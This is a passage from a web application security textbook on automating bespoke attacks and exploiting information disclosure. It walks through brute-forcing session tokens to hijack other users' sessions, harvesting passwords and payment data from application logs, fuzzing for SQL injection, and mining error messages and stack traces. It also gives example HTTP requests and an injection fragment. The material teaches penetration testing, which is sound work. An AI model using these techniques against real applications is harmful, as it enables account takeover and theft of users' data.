000000-fb2200-16cb12-172ba72551

000000-bc7192-16cb12-172ba7279e

000000-73091f-16cb12-172ba729e8

000000-918cb1-16cb12-172ba72a2a

000000-aa820f-16cb12-172ba72b58

000000-bc8710-16cb12-172ba72e2b

You follow the steps described in Chapter 7 to analyze these tokens. It is evi-

dent that approximately half of the token is not changing, but you also dis-

cover that the second portion of the token is not actually processed by the

application either. Modifying this portion entirely does not invalidate your

tokens. Furthermore, although it is not trivially sequential, the final portion

clearly appears to be incrementing in some fashion. This looks like a very

promising opportunity for a session hijacking attack.

To leverage automation to deliver this attack, you need to find a single

request/response pair that can be used to detect valid tokens. Typically, any

request for an authenticated page of the application will serve this purpose.

You decide to target the main home page presented to each user following

GET /home.jsp HTTP/1.1

Host: wahh-app.com

Cookie: SessionID=000000-fb2200-16cb12-172ba72551

Chapter 13 ■ Automating Bespoke Attacks 495

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 495

Because of what you know about the structure and handling of session

tokens, your attack only needs to modify the final portion of the token. In fact,

because of the sequence identified, the most productive initial attack will mod-

ify only the last few digits of the token. Accordingly, you configure Intruder

with a single payload position, as shown in Figure 13-2.

Figure 13-2: Setting a custom payload position

Your payloads need to sequence through all possible values for the final

three digits. The token appears to use the same character set as hexadecimal

numbers: 0–9 and a–f. So you configure a payload source to generate all hexa-

decimal numbers in the range 0x000–0xfff, as shown in Figure 13-3.

Figure 13-3: Configuring numeric payloads

496 Chapter 13 ■ Automating Bespoke Attacks

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 496

In attacks to enumerate valid session tokens, identifying hits is typically

straightforward, and in the present case you have determined that the appli-

cation returns an HTTP 200 response when a valid token is supplied, and an

HTTP 302 redirect back to the login page when an invalid token is supplied.

Hence, you don’t need to configure any custom response analysis for this

attack.

Launching the attack causes Intruder to quickly iterate through the requests.

The attack results are displayed in the form of a table. You can click on each

column heading to sort the results according to the contents of that column.

Sorting by status code enables you to easily identify the valid tokens that you

have discovered, as shown in Figure 13-4.

Figure 13-4: Sorting attack results to quickly identify hits

The attack is successful. You can take any of the payloads that caused HTTP

200 responses, replace the last three digits of your session token with this, and

thereby hijack the sessions of other application users. However, take a closer

look at the table of results. Most of the HTTP 200 responses have roughly the

same response length, because the home page presented to different users is

more or less the same. However, two of the responses are much longer, indi-

cating that a different home page was returned.

You can double-click on a result item in Intruder to display the server’s

response in full, either as raw HTTP or rendered as HTML. Doing this reveals

that the longer home pages contain a much larger set of menu options than

your home page does. It appears that these two hijacked sessions belong to

more-privileged users.

Chapter 13 ■ Automating Bespoke Attacks 497

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 497

TIP The response length very frequently proves to be a strong indicator of

anomalous responses that merit further investigation. As in the above case, a

different length of response can point towards interesting differences that you

may not have been anticipating when you devised the attack. Therefore, even if

another attribute provides a reliable indicator of hits, such as the HTTP status

code, you should always inspect the response length column to identify other

responses that are interesting.

Attack 2: Harvesting Information

You use your intercepting proxy to set one of the more privileged session

tokens in your browser and so begin using the application interactively as the

compromised user. Among the various additional functionality to which you

now have access is a logging function, which contains log entries for all kinds

of actions performed by other users of the application. Logs of this kind often

provide a gold mine of useful information that can assist you in furthering

your attack. Reading through a few entries, you discover that the application

is logging detailed debugging information whenever an error occurs. This

includes the username of the relevant user, the user’s session token, and the

full parameters of the request. Such information is useful to application devel-

opers when investigating and resolving errors within the application, and it is

equally useful to an attacker. You can quickly grab a list of valid usernames

and session tokens, and you can also capture the data entered by many other

application users. If an error occurred when a user supplied some sensitive

information, such as a password or credit card details, then you will be able to

harvest all of this information by trawling through the logs.

Log file entries are accessed using the following request, where the

logid

parameter is a sequential number:

POST /secure/logs.jsp HTTP/1.1

Host: wahh-app.com

Cookie: SessionID=000000-fb2200-16cb12-172ba72044

Content-Length: 83

action=view&resource=eventLogs&DB=wahh.audit&returnURL=/secure/logs.jsp&logid=

29810

To configure Intruder to iterate through log file entries, you will need to use

a numeric payload source to generate integers within the range of identifiers

in use, and you will need to set a single payload position, targeting the

logid

parameter, as shown in Figure 13-5.

498 Chapter 13 ■ Automating Bespoke Attacks

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 498

Figure 13-5: Positioning the payload

When a log file entry contains a listing of user-supplied parameters, the rel-

evant part of the HTML source looks like this:

<div style=”param”>action=search</div>

<div style=”param”>source=homeware</div>

<div style=”param”>sort=price</div>

<div style=”param”>start=20</div>

<div style=”param”>q=toaster</div>

You can configure Intruder to capture all of this information in a usable form

with the Extract Grep function. This works in a similar way to the extract func-

tion of JAttack — you specify the expression which precedes the item you

want to extract. However, in the present case, there are a variable number of

items you want to extract, each preceded by the same expression. To handle

this scenario, you simply need to enter this expression multiple times, and

Intruder will search through the response for each occurrence, capturing

whatever comes next, until no more occurrences are found, as shown in

Figure 13-6.

Launching this attack quickly iterates through all of the log file entries in the

range specified. Many of the entries contain debugging information and show

the details of the data submitted by the user. As before, you can sort the results

by the first extracted data column, to quickly review this for interesting items,

as shown in Figure 13-7.

Chapter 13 ■ Automating Bespoke Attacks 499

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 499

Figure 13-6: Configuring Extract Grep

Figure 13-7: Data harvested from log file entries

Even the first few results from the attack appear to contain plenty of useful

data, including usernames, passwords, and payment information. Continuing

to mine data from the logs could soon enable you to compromise an adminis-

trative account and own the entire application.

Attack 3: Application Fuzzing

In addition to exploiting the log functionality to extract useful information,

you should also, of course, probe it for common vulnerabilities. Functionality

that can be reached only by privileged users is often subject to less stringent

500 Chapter 13 ■ Automating Bespoke Attacks

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 500

security testing, because it is assumed that only trusted users will access it. If

you can somehow gain access to the functionality, you may be able to exploit

any defect in it to escalate privileges even further — potentially compromising

the entire database or web server.

To perform a quick fuzz test of the previous request, you need to set payload

positions at all of the request parameters, not only the

logid parameter. You

can do this simply by clicking the “auto” button on the positions tab. You then

need to configure a set of attack strings to use as payloads and some common

error messages to search responses for. Intruder contains built-in sets of strings

for both of these uses.

As with the fuzzing attack performed using JAttack, you then need to man-

ually review the table of results to identify any anomalies that merit further

investigation, as shown in Figure 13-8. As before, you can click on column

headings to sort the responses in various ways, to help identify interesting

cases.

Figure 13-8: Results from fuzzing a single request

From an initial look at the results, it strongly appears that the application is

vulnerable to SQL injection. In payload positions 2 and 3, when a single quo-

tation mark is submitted, the application returns an HTTP 500 status code and

a message containing the string

ODBC. This behavior definitely warrants some

manual investigation to confirm and exploit the bug.

TIP You can right-click on any interesting-looking result and send the

response to the Burp Repeater tool. This enables you to modify the request

manually and reissue it multiple times, to test the application’s handling of

different payloads, probe for filter bypasses, or deliver actual exploits.

Chapter 13 ■ Automating Bespoke Attacks 501

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 501

Chapter Summary

When you are attacking a web application, the majority of the necessary tasks

need to be tailored to that application’s behavior and the methods by which it

enables you to interact with and manipulate it. Because of this, you will often

find yourself working manually, submitting individually crafted requests, and

reviewing the application’s responses to these.

The techniques we described in this chapter are conceptually intuitive. They

involve leveraging automation to make these bespoke tasks easier, faster, and

more effective. It is possible to automate virtually any manual procedure that

you wish to carry out — using the power and reliability of your own computer

to attack the defects and weak points of your target.

Although conceptually straightforward, using bespoke automation in an

effective way requires experience, skill, and imagination. There are tools that

will help you, or you can write your own. But there is no substitute for the

intelligent human input that distinguishes a truly accomplished web applica-

tion hacker from a mere amateur. When you have mastered all of the tech-

niques described in the other chapters of this book, you should return to this

topic, and practice the different ways in which bespoke automation can be

used in the application of those techniques.

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. Identify three identifiers of hits when using automation to enumerate

identifiers within an application.

2. For each of the following categories, identify one fuzz string that can

often be used to identify it:

(a) SQL injection

(b) OS command injection

(d) Script file inclusion

3. When you are fuzzing a request that contains a number of different

parameters, why is it important to perform requests targeting

each parameter in turn and leaving the others unmodified?

502 Chapter 13 ■ Automating Bespoke Attacks

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 502

4. You are formulating an automated attack to brute force a login function

to discover additional account credentials. You find that the application

returns an HTTP redirection to the same URL regardless of whether you

submit valid or invalid credentials. In this situation, what is the most

likely means you can use to detect hits?

5. When you are using an automated attack to harvest data from within

the application, you will often find that the information you are inter-

ested in is preceded by a static string that enables you to easily capture

the data following it. For example:

<input type=”text” name=”LastName” value=”

On other occasions, you may find that this is not the case, and that the

data preceding the information you need is more variable. In this situa-

tion, how can you devise an automated attack that still fulfills your

needs?

Chapter 13 ■ Automating Bespoke Attacks 503

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 503

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 504

505

In Chapter 4, we described various techniques you can use to map a target

application and gain an initial understanding of how it works. That methodol-

ogy involved interacting with the application in largely benign ways, to cata-

log its content and functionality, determine the technologies in use, and

identify the key attack surface.

In this chapter, we describe ways in which you can extract further informa-

tion from an application during an actual attack. This mainly involves interact-

ing with the application in unexpected and malicious ways, and exploiting

anomalies in the application’s behavior in order to extract information that is of

value to you. If successful, such an attack may enable you to retrieve sensitive

data such as user credentials, gain a deeper understanding of an error condition

in order to fine-tune your attack, discover more detail about the technologies in

use, and map the application’s internal structure and functionality.

Exploiting Error Messages

Many web applications return informative error messages when unexpected

events occur. These may range from simple built-in messages that disclose

only the category of the error, to full-blown debugging information that gives

away a lot of detail about the application’s state.

Exploiting Information

Disclosure

CHAPTER

70779c14.qxd:WileyRed 9/14/07 3:14 PM Page 505

Most applications are subject to various kinds of usability testing prior to

deployment, and this testing will typically identify most error conditions that

may arise when the application is being used in the normal way. These condi-

tions are therefore normally handled in a graceful manner that does not

involve any technical messages being returned to the user. However, when an

application is under active attack, it is likely that a much wider range of error

conditions will arise, which may result in more detailed information being

returned to the user. Even the most security-critical applications, such as those

used by online banks, have been found to return highly verbose debugging

output when a sufficiently unusual error condition is generated.

Script Error Messages

When an error arises in an interpreted web scripting language, such as

VBScript, the application typically returns a simple message disclosing the

nature of the error, and possibly the line number of the file where the error

occurred. For example:

Microsoft VBScript runtime error 800a0009

Subscript out of range: [number -1]

/register.asp, line 821

This kind of message does not typically contain any sensitive information

about the state of the application or the data being processed. However, it may

assist you in various ways in narrowing down the focus of your attack. For

example, when you are inserting different attack strings into a specific para-

meter to probe for common vulnerabilities, you may encounter the following

message:

Microsoft VBScript runtime error ‘800a000d’

Type mismatch: ‘[string: “‘“]‘

/scripts/confirmOrder.asp, line 715

This message indicates that the value that you have modified is probably

being assigned to a numeric variable, and you have supplied input which can-

not be so assigned because it contains non-numeric characters. In this situa-

tion, it is highly likely that nothing is to be gained by submitting non-numeric

attack strings as this parameter, and so for many categories of bugs, you will

be better off targeting other parameters.

A different way in which this type of error message may assist you is in

gaining a better understanding of the logic that is implemented within

the server-side application. Because the message discloses the line number

where the error occurred, you may be able to confirm whether two different

506 Chapter 14 ■ Exploiting Information Disclosure

70779c14.qxd:WileyRed 9/14/07 3:14 PM Page 506

malformed requests are triggering the same error or different errors. You may

also be able to determine the sequence in which different parameters are

processed, by submitting bad input within multiple parameters and identify-

ing the location at which an error occurs. By systematically manipulating dif-

ferent parameters, you may be able to map out the different code paths being

executed on the server.

TIP Even if an error message does not disclose any interesting information, it

may represent an exploitable vulnerability. For example, it is common to find

XSS bugs in error messages which contain the anomalous user-supplied input

that generated the error (see Chapter 12).

Stack Traces

Most web applications are written in languages that are more complex than

simple scripts but which still run in a managed execution environment — for

example, Java, C#, and Visual Basic .NET. When an unhandled error occurs in

these languages, it is common to see full stack traces being returned to the

browser.

A stack trace is a structured error message that begins with a description of

the actual error. This is followed by a series of lines describing the state of the

execution call stack when the error occurred. The top line of the call stack

shows the function that generated the error, the next line shows the function

that invoked the previous function, and so on down the call stack until the

hierarchy of function calls is exhausted.

The following is an example of a stack trace generated by an ASP.NET

application:

[HttpException (0x80004005): Cannot use a leading .. to exit above the

top directory.]

System.Web.Util.UrlPath.Reduce(String path) +701

System.Web.Util.UrlPath.Combine(String basepath, String relative) +304

System.Web.UI.Control.ResolveUrl(String relativeUrl) +143

PBSApp.StatFunc.Web.MemberAwarePage.Redirect(String url) +130

PBSApp.StatFunc.Web.MemberAwarePage.Process() +201

PBSApp.StatFunc.Web.MemberAwarePage.OnLoad(EventArgs e)

System.Web.UI.Control.LoadRecursive() +35

System.Web.UI.Page.ProcessRequestMain() +750

Version Information: Microsoft .NET Framework Version:1.1.4322.2300;

ASP.NET Version:1.1.4322.2300

Chapter 14 ■ Exploiting Information Disclosure 507

70779c14.qxd:WileyRed 9/14/07 3:14 PM Page 507

This kind of error message provides a large amount of useful information

that may assist you in fine-tuning your attack against the application:

■■

It often describes the precise reason why an error occurred. This may

enable you to adjust your input to circumvent the error condition and

advance your attack.

■■

The call stack typically makes reference to a number of library and third-

party code components that are being used within the application. You

can review the documentation for these components to understand their

intended behavior and assumptions. You can also create your own local

implementation and test this to understand the ways in which it handles

unexpected input and potentially identify vulnerabilities.

■■

The call stack includes the names of the proprietary code components

being used to process the request. The naming scheme for these and the

interrelationships between them may allow you to infer details about

the internal structure and functionality of the application.

■■

The stack trace often includes line numbers. As with the simple script

error messages described previously, these may enable you to probe and

understand the internal logic of individual application components.

■■

The error message often includes additional information about the

application and the environment in which it is running. In the preced-

ing example, you can determine the exact version of the ASP.NET plat-

form being used. This enables you to investigate the platform for

known or new vulnerabilities, anomalous behavior, common configura-

tion errors, and so on.

Informative Debug Messages

Some applications generate custom error messages that contain a large

amount of debug information. These are normally implemented to facilitate

debugging during development and testing, and often contain rich detail

about the runtime state of the application. For example:

-------------------------------------------

* * * S E S S I O N * * *

-------------------------------------------

i5agor2n2pw3gp551pszsb55

SessionUser.Sessions App.FEStructure.Sessions

SessionUser.Auth 1

SessionUser.BranchID 103

SessionUser.CompanyID 76

SessionUser.BrokerRef RRadv0

SessionUser.UserID 229

508 Chapter 14 ■ Exploiting Information Disclosure

70779c14.qxd:WileyRed 9/14/07 3:14 PM Page 508

SessionUser.Training 0

SessionUser.NetworkID 11

SessionUser.BrandingPath FE

LoginURL /Default/fedefault.aspx

ReturnURL ../default/fedefault.aspx

SessionUser.Key f7e50aef8fadd30f31f3aea104cef26ed2ce2be50073c

SessionClient.ID 306

SessionClient.ReviewID 245

UPriv.2100

SessionUser.NetworkLevelUser 0

UPriv.2200

SessionUser.BranchLevelUser 0

SessionDatabase fd219.prod.wahh-bank.com

The following items are commonly included in verbose debug messages:

■■

Values of key session variables that can be manipulated via user input.

■■

Hostnames and credentials for back-end components such as databases.

■■

File and directory names on the server.

■■

Information embedded within meaningful session tokens (see

Chapter 7).

■■

Encryption keys used to protect data transmitted via the client (see

Chapter 5).

■■

Debug information for exceptions arising in native code components,

including the values of CPU registers, contents of the stack, and a list of

the loaded DLLs and their base addresses (see Chapter 15).

When this kind of error reporting functionality is present in live production

code, it may signify a critical weakness to the security of the application. You

should review it closely to identify any items that can be used to further

advance your attack, and any ways in which you can supply crafted input to

manipulate the application’s state and control the information retrieved.

Server and Database Messages

Informative error messages are often returned not by the application itself but

by some back-end component such as a database, mail server, or SOAP server.

If a completely unhandled error occurs, the application will typically respond

with an HTTP 500 status code, and the response body may contain further

information about the error. In other cases, the application may handle the

error gracefully and return a customized message to the user, sometimes

including error information generated by the back-end component.

Chapter 14 ■ Exploiting Information Disclosure 509

70779c14.qxd:WileyRed 9/14/07 3:14 PM Page 509

Database error messages often contain information that you can use to

advance an attack. For example, they often disclose the query that generated

the error, enabling you to fine-tune a SQL injection attack:

Failed to retrieve row with statement - SELECT object_data FROM

deftr.tblobject WHERE object_id = ‘FDJE00012’ AND project_id = ‘FOO’ and

1=2--‘

See Chapter 9 for a detailed methodology describing how to develop data-

base attacks and extract information based on error messages.

HACK STEPS

■ When you are probing the application for common vulnerabilities by sub-

mitting crafted attack strings in different parameters, always monitor the

application’s responses to identify any error messages that may contain

useful information.

■ Be aware that error information which is returned within the server’s

response may not be rendered on-screen within the browser. An efficient

way to identify many error conditions is to search each raw response for

keywords that are often contained in error messages. For example:

error

exception

illegal

invalid

fail

stack

access